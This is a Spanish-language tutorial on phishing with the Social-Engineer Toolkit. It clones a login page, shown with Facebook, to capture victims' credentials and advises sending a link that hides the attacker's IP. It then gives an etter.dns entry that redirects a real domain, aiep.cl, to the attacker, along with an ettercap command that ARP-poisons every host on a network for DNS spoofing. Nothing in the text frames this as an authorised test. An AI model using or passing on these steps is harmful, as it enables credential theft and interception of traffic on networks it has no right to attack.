Phishing con setools


Phishing con setools: Lo primero que debemos hacer es clonar la página. Para este manual se utilizará la herramienta Setoolkit que se encuentra en Kali Linux.

Configurando setoolkit

Si tenemos instalado apache, debemos detenerlo con el comando service apache2 stop.

Luego ingresamos el comando setoolkity al dar Enter se iniciará como en las imágenes siguientes.

Es posible que nos pida aceptar términos (tecleamos la letra “y” y damos Enter).

Como vemos en la imagen anterior, aparece un menú. Aquí vamos a elegir el 1, que es un ataque de ingeniería social al cual pertenece el phishing.

Ahora nos muestra el siguiente menú.

Aquí elegiremos la opción 2 para un ataque de sitio web donde emularemos una página web para engañar a nuestra víctima.

Ahora veremos el siguiente menú.

Vamos a elegir la opción 3 para utilizar el método de credenciales o login.

Nos muestra el siguiente menú.

Acá podemos usar una de las 3 plantillas que posee setoolskit (Java, Google, Twitter) o usar la opción 2 (que es la que utilizaré en esta guía) para clonar un sitio.

Nos pedirá el IP desde donde realizaremos el ataque.

Luego nos pide la página a clonar.

Después nos aparece un mensaje anunciado que tal vez debamos mover archivosdesde /var/www a /var/www/html. Damos Enter.

Ahora nos muestra lo siguiente:

Damos Enter.

Ya estamos listos para engañar a nuestra víctima.

Pero antes, haremos una prueba entrando al IP del servidor.

Bien, está funcionando la página. Ahora debemos engañar al usuario enviando un correo u otra forma para que ingrese a nuestro IP oculto en un link.

Ejemplo de ataque

La victima al ingresar sus datos, nosotros podremos verlos en la ventana de setoolkit.

Y luego ellos verán la página real de login de Facebook.

Ataque don DNS Spoof

Debido a que Facebook, twitter y otras páginas obligan a entrar a sus páginas a través de https, no es posible utilizar sslstrip para engañar a la víctima y hacerla entrar vía http.

Sin embargo, hay otras páginas con login en http y podemos engañar a la víctima incluso si ingresan la dirección correcta.

Para eso editaremos el siguiente archivo.

nano /etc/ettercap/etter.dns

Y agregaremos lo siguiente:

aiep.cl       A    (IP kali)
*. aiep.cl     A    (IP kali)
www. aiep.cl   PTR  (IP kali)

Donde IP Kali es la IP de nuestra máquina atacante. Guardamos los cambios.

Por último, se lanza el siguiente comando:

ettercap -T -q -i eth0 -P dns_spoof -M arp ///

Argumentos:
-T : Interfaz de sólo texto
-q : Modo silencioso (no muestra el contenido de los paquetes)
-i eth0 : Seleccionamos la interfaz de red a utilizar
-P dns_spoof : Activamos el plugin de dns_spoof
-M arp /// : MitM (Man in the Middle) arp ///. Decimos que afecta a todas las máquinas de la red.

Y ya tendremos el ataque en funcionamiento.

Ahora solo debemos probar en la máquina victima entrando a la dirección http://www.aiep.cl/

Al ingresar los datos, podremos verlos en la ventana de setoolkit.